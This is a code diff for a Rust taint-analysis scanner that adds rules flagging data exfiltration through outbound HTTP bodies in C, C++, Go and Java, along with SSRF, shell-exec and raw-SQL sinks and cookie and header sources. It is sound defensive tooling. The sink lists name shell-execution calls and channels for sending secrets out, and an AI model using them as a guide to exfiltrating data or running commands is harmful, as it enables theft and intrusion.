Some(Verdict::NotAttempted) | None => Confidence::Low, + }; + + // Guarded flow: drop a tier. A validation predicate on the path means + // the leak may be unreachable in practice, so the corroborated witness + // is downgraded one step (Medium → Low; Low stays Low). + if diag.path_validated && base > Confidence::Low { + base = Confidence::Low; + } + + apply_engine_notes_cap(diag, base) +} + /// Score a structured `SourceKind` value. /// /// UserInput=+3, EnvironmentConfig=+2, Unknown/FileSystem=+1, Database/CaughtException=0. 
fn structured_source_kind_score(kind: crate::labels::SourceKind) -> i32 { use crate::labels::SourceKind; match kind { - SourceKind::UserInput => 3, + // Cookie / Header carry auth material, score them at the same + // ranking weight as direct user input rather than the lower + // FileSystem/Database tiers. + SourceKind::UserInput | SourceKind::Cookie | SourceKind::Header => 3, SourceKind::EnvironmentConfig => 2, SourceKind::Unknown | SourceKind::FileSystem => 1, SourceKind::Database | SourceKind::CaughtException => 0, @@ -538,6 +612,8 @@ pub fn generate_explanation(diag: &Diag) -> Option { use crate::labels::SourceKind; match kind { SourceKind::UserInput => "user input", + SourceKind::Cookie => "cookie", + SourceKind::Header => "request header", SourceKind::EnvironmentConfig => "environment/config", SourceKind::Database => "database", SourceKind::FileSystem => "file system", diff --git a/src/labels/c.rs b/src/labels/c.rs index c38010aa..31222bf2 100644 --- a/src/labels/c.rs +++ b/src/labels/c.rs @@ -1,4 +1,4 @@ -use crate::labels::{Cap, DataLabel, Kind, LabelRule, ParamConfig}; +use crate::labels::{Cap, DataLabel, GateActivation, Kind, LabelRule, ParamConfig, SinkGate}; use phf::{Map, phf_map}; pub static RULES: &[LabelRule] = &[ @@ -69,6 +69,33 @@ pub static RULES: &[LabelRule] = &[ }, ]; +/// Gated sinks for C. +/// +/// `curl_easy_setopt(handle, option, payload)` is libcurl's option-binding +/// interface; the option identifier at arg 1 selects which slot the payload +/// fills. `CURLOPT_POSTFIELDS` and `CURLOPT_COPYPOSTFIELDS` carry the +/// request body, while other CURLOPT_* constants designate URL / auth / TLS +/// behaviour and are not DATA_EXFIL-relevant. Gating on the macro identifier +/// keeps the rule from over-firing on `curl_easy_setopt(h, CURLOPT_URL, url)` +/// (covered separately by the `curl_easy_perform` SSRF flat sink). 
+/// +/// Identifier-based activation is enabled via the macro-arg fallback in +/// `cfg::mod::classify_gated_sink` for `lang == "c"`. Header-parsing +/// libraries (e.g. libmicrohttpd, mongoose) lack a stable surface and are +/// left to project-specific config. +pub static GATED_SINKS: &[SinkGate] = &[SinkGate { + callee_matcher: "curl_easy_setopt", + arg_index: 1, + dangerous_values: &["CURLOPT_POSTFIELDS", "CURLOPT_COPYPOSTFIELDS"], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: true, + payload_args: &[2], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::ValueMatch, +}]; + pub static KINDS: Map<&'static str, Kind> = phf_map! { // control-flow "if_statement" => Kind::If, diff --git a/src/labels/cpp.rs b/src/labels/cpp.rs index 1587ad92..43ee9119 100644 --- a/src/labels/cpp.rs +++ b/src/labels/cpp.rs @@ -1,4 +1,4 @@ -use crate::labels::{Cap, DataLabel, Kind, LabelRule, ParamConfig}; +use crate::labels::{Cap, DataLabel, GateActivation, Kind, LabelRule, ParamConfig, SinkGate}; use phf::{Map, phf_map}; pub static RULES: &[LabelRule] = &[ @@ -91,6 +91,28 @@ pub static RULES: &[LabelRule] = &[ }, ]; +/// Gated sinks for C++. +/// +/// Mirror of the C gate set: `curl_easy_setopt` with `CURLOPT_POSTFIELDS` / +/// `CURLOPT_COPYPOSTFIELDS` at arg 1 binds the request body at arg 2. +/// Identifier-based activation is enabled via the macro-arg fallback in +/// `cfg::mod::classify_gated_sink` for `lang == "cpp" / "c++"`. Modern C++ +/// HTTP wrappers (cpr, Boost.Beast) layer over libcurl or directly over the +/// socket; their ergonomic surfaces differ enough that adding gates per- +/// library is left for a follow-up driven by the corpus. 
+pub static GATED_SINKS: &[SinkGate] = &[SinkGate { + callee_matcher: "curl_easy_setopt", + arg_index: 1, + dangerous_values: &["CURLOPT_POSTFIELDS", "CURLOPT_COPYPOSTFIELDS"], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: true, + payload_args: &[2], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::ValueMatch, +}]; + pub static KINDS: Map<&'static str, Kind> = phf_map! { // control-flow "if_statement" => Kind::If, diff --git a/src/labels/go.rs b/src/labels/go.rs index ae4f6dca..0ad247ad 100644 --- a/src/labels/go.rs +++ b/src/labels/go.rs @@ -1,11 +1,13 @@ -use crate::labels::{Cap, DataLabel, Kind, LabelRule, ParamConfig, RuntimeLabelRule}; +use crate::labels::{ + Cap, DataLabel, GateActivation, Kind, LabelRule, ParamConfig, RuntimeLabelRule, SinkGate, +}; use crate::utils::project::{DetectedFramework, FrameworkContext}; use phf::{Map, phf_map}; pub static RULES: &[LabelRule] = &[ // ─────────── Sources ─────────── LabelRule { - matchers: &["os.Getenv"], + matchers: &["os.Getenv", "os.LookupEnv", "os.Environ"], label: DataLabel::Source(Cap::all()), case_sensitive: false, }, @@ -16,8 +18,12 @@ pub static RULES: &[LabelRule] = &[ "r.URL", "r.Body", "r.Header", + "r.Header.Get", + "r.Header.Values", "r.URL.Query", "r.URL.Query.Get", + "r.Cookie", + "r.Cookies", "Request.FormValue", "Request.URL", ], @@ -97,27 +103,20 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Sink(Cap::HTML_ESCAPE), case_sensitive: false, }, + // ── Outbound HTTP clients (SSRF) ─────────────────────────────────── + // + // These are modeled as destination-aware gated sinks in `GATED_SINKS` + // below. Flat Sink rules would over-flag every positional argument as + // SSRF (so a tainted body in `http.Post(url, contentType, body)` would + // fire SSRF on the body), and the gate machinery short-circuits when a + // flat Sink label is already attached to the callee, blocking DATA_EXFIL + // body-flow gates from running. 
+ // + // `net.Dial` / `net.DialTimeout` keep their flat-sink modeling: the + // first positional arg is the network address with no body / payload + // companion, so the over-flag concern does not apply. LabelRule { - matchers: &[ - "http.Get", - "http.Post", - "http.Head", - "http.NewRequest", - "http.NewRequestWithContext", - "net.Dial", - "net.DialTimeout", - // `http.DefaultClient` is the package-level default `*http.Client`. - // Idiomatic Go SSRF sinks (Owncast CVE-2023-3188) use the - // `http.DefaultClient.Get(url)` form rather than the bare - // `http.Get(url)` helper, so the suffix-matched callee text needs - // an explicit entry here, bare `Get/Post/Do/Head` would - // over-match unrelated method names. - "http.DefaultClient.Get", - "http.DefaultClient.Post", - "http.DefaultClient.Head", - "http.DefaultClient.Do", - "http.DefaultClient.PostForm", - ], + matchers: &["net.Dial", "net.DialTimeout"], label: DataLabel::Sink(Cap::SSRF), case_sensitive: false, }, @@ -135,6 +134,343 @@ pub static RULES: &[LabelRule] = &[ }, ]; +/// Argument-role-aware Go sinks. Two classes coexist on the outbound HTTP +/// surface, mirroring the JS/TS modeling: +/// +/// * SSRF on the URL-bearing position of a one-shot request (`http.Get`, +/// `http.Post`, `http.NewRequest`, `http.DefaultClient.*`). +/// * `Cap::DATA_EXFIL` on the body / payload position when the source is +/// Sensitive (cookies, headers, env, db reads). Gates fire only when +/// taint reaches the body argument, so a tainted URL alone never +/// activates DATA_EXFIL and a tainted body alone never activates SSRF. +/// +/// `http.NewRequest` / `http.NewRequestWithContext` carry an SSRF gate on +/// their URL position only. In Go's two-step idiom the actual network +/// call happens at `client.Do(req)`; body taint flows from the body +/// argument through the returned `*http.Request` via default arg → return +/// propagation, and then activates the `http.DefaultClient.Do` DATA_EXFIL +/// gate below. 
Modeling NewRequest as a body propagator (rather than a +/// body sink) avoids duplicate findings on the idiomatic +/// `req, _ := http.NewRequest(...); client.Do(req)` shape. +pub static GATED_SINKS: &[SinkGate] = &[ + // ── SSRF gates (URL-bearing position) ──────────────────────────────── + // `http.Get(url)` — url is arg 0. + SinkGate { + callee_matcher: "http.Get", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // `http.Head(url)` — url is arg 0. + SinkGate { + callee_matcher: "http.Head", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // `http.Post(url, contentType, body)` — url is arg 0. + SinkGate { + callee_matcher: "http.Post", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // `http.PostForm(url, data)` — url is arg 0. + SinkGate { + callee_matcher: "http.PostForm", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // `http.NewRequest(method, url, body)` — url is arg 1. 
+ SinkGate { + callee_matcher: "http.NewRequest", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // `http.NewRequestWithContext(ctx, method, url, body)` — url is arg 2. + SinkGate { + callee_matcher: "http.NewRequestWithContext", + arg_index: 2, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[2], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // `http.DefaultClient.Get(url)` / `.Head(url)` — url is arg 0. + SinkGate { + callee_matcher: "http.DefaultClient.Get", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "http.DefaultClient.Head", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // `http.DefaultClient.Post(url, contentType, body)` — url is arg 0. + SinkGate { + callee_matcher: "http.DefaultClient.Post", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // `http.DefaultClient.PostForm(url, data)` — url is arg 0. 
+ SinkGate { + callee_matcher: "http.DefaultClient.PostForm", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // ── DATA_EXFIL gates (body-bearing position) ───────────────────────── + // `http.Post(url, contentType, body)` — body is arg 2. + SinkGate { + callee_matcher: "http.Post", + arg_index: 2, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[2], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // `http.PostForm(url, data)` — `data` (arg 1) is `url.Values`. Form + // bodies serialize the same operator state cookies / headers do, so a + // tainted Sensitive value reaching the form payload is DATA_EXFIL. + SinkGate { + callee_matcher: "http.PostForm", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // `http.DefaultClient.Do(req)` — `req` (arg 0) is the `*http.Request` + // value. Body taint introduced via either `http.NewRequest(_, _, body)` + // (default arg → return propagation) or a later `req.Body = body` field + // write reaches this sink through the request value. 
+ SinkGate { + callee_matcher: "http.DefaultClient.Do", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // `http.DefaultClient.PostForm(url, data)` — same as `http.PostForm` + // but invoked through the package-level default `*http.Client`. + SinkGate { + callee_matcher: "http.DefaultClient.PostForm", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // `http.DefaultClient.Post(url, contentType, body)` — body is arg 2. + SinkGate { + callee_matcher: "http.DefaultClient.Post", + arg_index: 2, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[2], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // ── Common third-party HTTP clients ───────────────────────────────── + // + // `go-resty/resty`: `client.R().SetBody(body).Post(url)` style. + // `SetBody(body)` carries the body into the chained request; the + // network call happens at the verb method. We model the verb + // methods (Get / Post / Put / Patch / Delete / Send / Execute) as + // DATA_EXFIL gates with `payload_args: &[]` (empty), which engages + // the receiver-tainted fallback in `collect_tainted_sink_vars`. A + // builder receiver carrying body taint from `SetBody` activates the + // sink without us needing a positional body arg. 
+ SinkGate { + callee_matcher: "resty.Request.Post", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "resty.Request.Put", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "resty.Request.Patch", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // `imroc/req`: `req.Post(url, req.BodyJSON(payload))`, the `BodyJSON` + // / `BodyXML` helpers wrap a tainted payload and pass it as arg 1+ of + // the verb call. Since the helper return value carries the body + // taint, gating the verb on every payload arg is sufficient. 
+ SinkGate { + callee_matcher: "req.Post", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1, 2, 3], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "req.Put", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1, 2, 3], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, +]; + pub static KINDS: Map<&'static str, Kind> = phf_map! { // control-flow "if_statement" => Kind::If, diff --git a/src/labels/java.rs b/src/labels/java.rs index 8c04e9f6..2d5d57c8 100644 --- a/src/labels/java.rs +++ b/src/labels/java.rs @@ -31,6 +31,15 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Source(Cap::all()), case_sensitive: false, }, + // Sensitive operator state: HTTP session attributes commonly carry + // auth tokens / CSRF tokens / signed user ids. Routed through the + // `Cookie` source-kind heuristic so DATA_EXFIL fires when these + // values leave the process via an outbound request body. + LabelRule { + matchers: &["HttpSession.getAttribute", "session.getAttribute"], + label: DataLabel::Source(Cap::all()), + case_sensitive: false, + }, // ───────── Sanitizers ────────── LabelRule { matchers: &["HtmlUtils.htmlEscape", "StringEscapeUtils.escapeHtml4"], @@ -121,6 +130,79 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Sink(Cap::SSRF), case_sensitive: false, }, + // ── Cross-boundary data exfiltration ────────────────────────────────── + // + // Outbound HTTP egress points where a Sensitive source (cookie, header, + // env, session attribute, db read) reaching the request body / payload + // is a cross-boundary disclosure distinct from SSRF. 
The flat-rule + // model relies on default arg → return propagation through builder + // chains: `HttpRequest.newBuilder().uri(u).POST(BodyPublishers.ofString(p)).build()` + // smears `p`-taint into the returned request, which then activates the + // sink at `client.send(req)`. + // + // Type-qualified resolution maps `restTemplate.postForObject(...)` → + // `HttpClient.postForObject` via the JAVA_HIERARCHY (RestTemplate, + // OkHttpClient, WebClient, CloseableHttpClient all subtype HttpClient), + // so a single set of `HttpClient.` rules covers every framework + // in scope. Plain user input is silenced by the source-sensitivity + // gate in `effective_sink_caps`, so this fires only on cookies / headers + // / env / session / db. + LabelRule { + matchers: &[ + // java.net.http: client.send(req) consumes a request that + // carries body-taint via BodyPublishers.ofString/ofByteArray/ + // ofInputStream through the builder chain. + "HttpClient.send", + "HttpClient.sendAsync", + // Spring RestTemplate verbs that take a body / entity. + "postForObject", + "postForEntity", + "RestTemplate.exchange", + "RestTemplate.put", + "RestTemplate.patchForObject", + // Apache HttpClient: httpClient.execute(req) where req is an + // HttpPost / HttpPut / HttpPatch with .setEntity(StringEntity(p)). + // CloseableHttpClient subtypes HttpClient so type-qualified + // resolution rewrites client.execute → HttpClient.execute. + "HttpClient.execute", + // Spring WebClient body-binding step: + // webClient.post().uri(u).bodyValue(payload).retrieve(). + // bodyValue is the explicit body-bind verb; default propagation + // carries the tainted body into the chain return so the sink + // attaches at the body-bind site itself (no cross-call needed). 
+ "bodyValue", + // Apache HttpClient body-binding: the `setEntity` step on + // HttpPost / HttpPut / HttpPatch mutates the request rather + // than returning the builder, so the receiver's SSA value at + // the later `httpClient.execute(req)` does not carry body + // taint via the default smear (which threads through return + // values, not field mutations). Firing DATA_EXFIL at the + // setEntity call itself catches the body-binding directly. + // The matcher is specific enough to avoid collisions — + // `setEntity` is Apache-HttpClient-specific. + "setEntity", + // OkHttp builder body-binding shortcut: when the chain + // doesn't roll through `.post(body).build()` (e.g. a helper + // function returns the Builder mid-chain), `RequestBody` + // is bound via `.post(body)` / `.put(body)` / `.patch(body)` + // / `.delete(body)` directly on the Builder. These methods + // also exist on unrelated classes (NIO, Streams) but in the + // OkHttp idiom the receiver type is `Request.Builder`; the + // receiver-type widening from `Request.Builder` → HttpClient + // isn't currently modeled, so matching them would need bare + // suffix-name matchers with receiver-agnostic firing risk. + // Conservative: they are NOT registered in v1, to avoid + // over-fire on non-OkHttp `post`/`put`/`patch` calls. + // OkHttp two-step: client.newCall(req).execute() / .enqueue(). + // Chain normalization strips `()` between dots so the tree- + // sitter callee text `client.newCall(req).execute` matches the + // suffix `newCall.execute` after normalization. 
+ "newCall.execute", + "newCall.enqueue", + ], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + }, LabelRule { matchers: &[ "readObject", diff --git a/src/labels/javascript.rs b/src/labels/javascript.rs index 2ebace19..0c8d7367 100644 --- a/src/labels/javascript.rs +++ b/src/labels/javascript.rs @@ -98,6 +98,26 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Sanitizer(Cap::HTML_ESCAPE), case_sensitive: false, }, + // Conventional forwarding wrappers, telemetry / analytics / metrics dispatch. + // Treating these as Sanitizer(DATA_EXFIL) encodes the project convention + // that a payload routed through a named forwarding boundary is an + // explicit, expected egress (the developer named the function), not the + // accidental cross-boundary leak DATA_EXFIL is meant to catch. Users who + // do not follow this convention can override per-project via + // [analysis.languages.javascript] custom rules; the convention is + // documented in docs/detectors/taint.md so projects can extend it. + LabelRule { + matchers: &[ + "serializeForUpstream", + "forwardPayload", + "tracker.send", + "analytics.track", + "metrics.report", + "logEvent", + ], + label: DataLabel::Sanitizer(Cap::DATA_EXFIL), + case_sensitive: false, + }, // Conventional project-local HTML escapers. Suffix word-boundary match // fires on bare calls to locally defined helpers (`function escapeHtml(x)` // invoked as `escapeHtml(x)`) across codebases that follow the common @@ -128,6 +148,23 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Sink(Cap::URL_ENCODE), case_sensitive: false, }, + // Shell-exec sinks. Qualified `child_process.*` and bare destructured- + // import forms (`exec`, `execSync`, `execFile`, ...) are both modeled as + // flat sinks here so module-aliased call sites like `cp.exec(...)` + // (where `cp = require('child_process')`) still fire via suffix match. 
+ // The bare-form FPs that motivated tightening are addressed elsewhere: + // + // * `container.exec(...)` (Dockerode) and `exec.start(...)` (the + // resulting `exec` handle) — `container.exec` is excluded via the + // EXCLUDES list below; `exec.start` is suppressed by restricting + // `first_member_label`'s suffix-strip-and-retry to `Source` labels + // only (see `cfg/helpers.rs`). + // * `execSync(cmd, { env: process.env })` flagging `process.env` + // flowing into the options arg — addressed by the + // `=exec`/`=execSync`/`=execFile`/... gates in `GATED_SINKS` below + // which set `payload_args: &[0]`. The cfg pass propagates a gate's + // payload_args restriction onto the matching flat sink so only arg + // 0 (the command string) is taint-checked at the call site. LabelRule { matchers: &[ "child_process.exec", @@ -136,8 +173,9 @@ pub static RULES: &[LabelRule] = &[ "child_process.execFile", // Bare forms from destructured imports: // const { exec, execSync } = require('child_process') - // Note: bare `exec` suffix-matches RegExp.prototype.exec() too, - // but in practice tainted data rarely flows to regexp.exec(). + // and module-aliased calls like `cp.exec(...)`. Receiver-name + // collisions (`container.exec`, etc.) are suppressed via + // EXCLUDES; arg-position restriction comes from the `=*` gates. "exec", "execSync", "execFile", @@ -250,16 +288,22 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Sink(Cap::SQL_QUERY), case_sensitive: false, }, - // ORM / query builder raw-SQL entry points + // ORM / query builder raw-SQL entry points. + // + // `$queryRaw` / `$executeRaw` are tagged-template forms; the SQL is + // assembled from a template literal so taint reaching arg 0 is the + // injection vector and modeling them as flat sinks is correct. 
+ // + // `$queryRawUnsafe` / `$executeRawUnsafe` accept positional bind + // parameters: `tx.$queryRawUnsafe(sqlTemplate, p1, p2, ...)` binds + // p1..pN as `$1..$N` (PostgreSQL prepared-statement params) and the SQL + // template at arg 0 is the only injection point. These are modeled as + // gated sinks below (`payload_args: &[0]`) so taint flowing only into + // the bind params no longer fires. `sequelize.query` and `knex.raw` + // also accept a separate bind-params object/array but the bind-params + // interface is non-positional in those APIs, so they stay flat for now. LabelRule { - matchers: &[ - "sequelize.query", - "knex.raw", - "$queryRaw", - "$queryRawUnsafe", - "$executeRaw", - "$executeRawUnsafe", - ], + matchers: &["sequelize.query", "knex.raw", "$queryRaw", "$executeRaw"], label: DataLabel::Sink(Cap::SQL_QUERY), case_sensitive: true, }, @@ -295,6 +339,17 @@ pub static EXCLUDES: &[&str] = &[ "req.session.regenerate", "req.session.save", "req.session.reload", + // Dockerode container API: `container.exec({ Cmd: [...] })` is the + // canonical non-shell exec path (the Cmd array is passed directly to + // the kernel via `execve`, no shell parsing). `exec.start(...)` is + // the follow-on stream attach. Suffix-matching the bare `exec` rule + // would otherwise classify every `.exec(...)` method call + // — including these — as a SHELL_ESCAPE sink. These patterns name + // the Dockerode SDK methods specifically; if a project happens to + // also expose its own `container.exec` shell wrapper, override via + // [analysis.languages.javascript] custom rules. + "container.exec", + "exec.start", ]; pub static GATED_SINKS: &[SinkGate] = &[ @@ -577,6 +632,128 @@ pub static GATED_SINKS: &[SinkGate] = &[ object_destination_fields: &["body", "headers", "json"], }, }, + // ── Shell-exec sinks (SHELL_ESCAPE) ────────────────────────────────── + // + // Only arg 0 (the command string) is a shell-injection payload. + // `options.env` / `options.cwd` / etc. 
at arg 1+ are not. Bare forms + // (`exec`, `execSync`, `execFile`, `execAsync`, `execPromise`) use the + // `=` exact-only sigil so they match the destructured-import shape + // (`const { exec } = require('child_process'); exec(cmd)`) without + // colliding with any `.exec` method (Dockerode's + // `container.exec`, `RegExp.prototype.exec`, etc.). + // Qualified `child_process.*` forms stay as flat sinks (see RULES above); + // gates run only when no flat sink already classifies the call, so adding + // them here would never fire. The bare destructured-import forms below + // are the only place where shell-exec needs gating. NOTE(review): RULES + // above still lists bare `exec` / `execSync` / `execFile` as flat sinks, + // which conflicts with "gates run only when no flat sink classifies the + // call"; confirm how the `payload_args` restriction reaches those calls. + SinkGate { + callee_matcher: "=exec", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SHELL_ESCAPE), + case_sensitive: true, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "=execSync", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SHELL_ESCAPE), + case_sensitive: true, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "=execFile", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SHELL_ESCAPE), + case_sensitive: true, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "=execAsync", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SHELL_ESCAPE), + 
case_sensitive: true, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "=execPromise", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SHELL_ESCAPE), + case_sensitive: true, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // ── Prisma raw-SQL with positional bind params (SQL_QUERY) ─────────── + // + // `tx.$queryRawUnsafe(sqlTemplate, p1, p2, ...)` binds `p1..pN` as + // PostgreSQL `$1..$N` prepared-statement parameters; only arg 0 (the + // SQL template) is the injection vector. Flat sinks here flagged taint + // flowing only into bind params, which is equivalent to a parameterised + // query and not exploitable. Suffix-match (no `=` sigil) so + // `tx.$queryRawUnsafe`, `prisma.$queryRawUnsafe`, etc. all qualify. + SinkGate { + callee_matcher: "$queryRawUnsafe", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SQL_QUERY), + case_sensitive: true, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "$executeRawUnsafe", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SQL_QUERY), + case_sensitive: true, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, ]; pub static KINDS: Map<&'static str, Kind> = phf_map! 
{ diff --git a/src/labels/mod.rs b/src/labels/mod.rs index 248d0695..39d7b877 100644 --- a/src/labels/mod.rs +++ b/src/labels/mod.rs @@ -320,6 +320,11 @@ static GATED_REGISTRY: Lazy> = Lazy:: m.insert("ts", typescript::GATED_SINKS); m.insert("python", python::GATED_SINKS); m.insert("py", python::GATED_SINKS); + m.insert("go", go::GATED_SINKS); + m.insert("php", php::GATED_SINKS); + m.insert("c", c::GATED_SINKS); + m.insert("cpp", cpp::GATED_SINKS); + m.insert("c++", cpp::GATED_SINKS); m }); @@ -473,6 +478,10 @@ pub fn lookup(lang: &str, raw: &str) -> Kind { pub enum SourceKind { /// Direct user input (request params, argv, stdin, form data) UserInput, + /// HTTP cookie value (carries session / auth material) + Cookie, + /// HTTP request header (may carry auth tokens, user-agent fingerprints) + Header, /// Environment variables and configuration EnvironmentConfig, /// File system reads @@ -485,10 +494,81 @@ pub enum SourceKind { Unknown, } +/// Sensitivity classification of a taint source. Drives detector classes +/// like `DATA_EXFIL` that only fire when the source carries information +/// the operator did not intend to leak. Plain user input echoed back into +/// an outbound request is not data exfiltration, the user already controls +/// it, surfacing it as a leak is noise. +/// +/// The threshold for `DATA_EXFIL` is `>= Sensitive`, plain user input is +/// suppressed. Projects that legitimately classify a request body as +/// sensitive (e.g. an API gateway forwarding pre-authenticated user tokens +/// out of a request body) can override via custom rules in `nyx.conf`, +/// either by re-classifying the source or by adding a Sanitizer rule for +/// `Cap::DATA_EXFIL` on the legitimate forwarding path. +#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, PartialOrd, Ord)] +pub enum Sensitivity { + /// Attacker-controlled but not secret in itself, request bodies, query + /// strings, form fields, argv. Echoing this to an outbound request is + /// not data exfiltration. 
